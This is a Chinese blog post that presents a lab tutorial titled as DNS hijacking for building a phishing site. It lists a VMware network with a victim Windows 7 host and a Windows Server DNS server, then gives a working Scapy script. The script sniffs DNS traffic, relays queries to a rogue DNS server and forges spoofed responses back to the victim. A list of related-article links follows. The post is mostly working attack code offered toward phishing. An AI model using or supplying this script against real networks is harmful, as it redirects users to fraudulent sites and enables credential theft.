中级DNS劫持,做钓鱼网站。
2019-06-11 07:30
2486 查看
环境:
配置一个目标网站www.wf.com
设置dns解析www.wf.com
网卡:192.168.88.2
Win7 被欺骗的 ip:192.168.88.143
Win server 2008 DNS服务器 ip:192.168.88.136
选择自己所在的网卡
代码如下:
from scapy.all import *
dnss="192.168.88.136"
xwlan="VMware Virtual Ethernet Adapter for VMnet8"
def task(p):
try:
pip=p[IP]
pudp=p[UDP]
pdns=p[DNS]
if p.dport==53 and pip.dst=="192.168.88.2": #请求包
#192.168.88.1给假dns发包
send(IP(src="192.168.88.1",dst=dnss,ttl=55)/UDP(sport=p.sport,dport=53)/pdns,iface=xwlan)
mm=pip.src
print(mm)
print("转发查询成功",mm)
#假dns发包给192.168.88.1回包
elif p.sport==53 and pip.src==dnss: #响应包
#开始造给目标主句造一个假包
mm=pip.src
send(IP(src="192.168.88.2",dst=mm,ttl=55)/UDP(sport=53,dport=p.dport)/pdns,iface=xwlan)
wz=pdns.qname.decode()
print(wz,"转发响应成功")
#except Exception as e:
#print(e)
except:
pass
print("开始攻击")
sniff(iface=xwlan,filter="udp port 53",timeout=300,prn=task)
劫持成功
抓包分析
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 网站被劫持了win8.1如何设置DNS解除拦截
- 网站dns被劫持,网站域名被劫持,域名跳转到别的网站的最新解决方法
- 修复运营商网站劫持,Win8.1怎么修改DNS
- 网站app被劫持怎么办?HTTPDNS阿里云域名防劫持, DNSPod 移动解析服务 D+
- 大型网站用户定位技术(智能 DNS 和 IP 重定向)
- 遭遇DNS劫持
- DNS 域名劫持、域名污染
- 本地主机DNS劫持演示及防范
- 局域网内DNS劫持方法
- 3、新手建个人网站教程--域名解析(DNS)
- 黄阶中级-《大型网站技术架构》- 概述 - 修改0次
- 钓鱼网站排名出炉:“建设银行”成榜首
- 【每日安全资讯】暴雪游戏存在DNS重绑定漏洞可导致玩家电脑被远程劫持
- 金山安全实验室公布中国互联网六大类钓鱼网站
- 使用dnspod进行简单的HTTP dns解析(防劫持)
- 3月钓鱼网站简报:.COM域名超68% 中国数据居二
- 简单说说DNS劫持_firefox吧_百度贴吧
- 淘宝故意拦截浏览器,要求升级而且还出现了一些账号搜索到的商品被劫持,还是开自己的网站商店为好。
- 电脑被dns劫持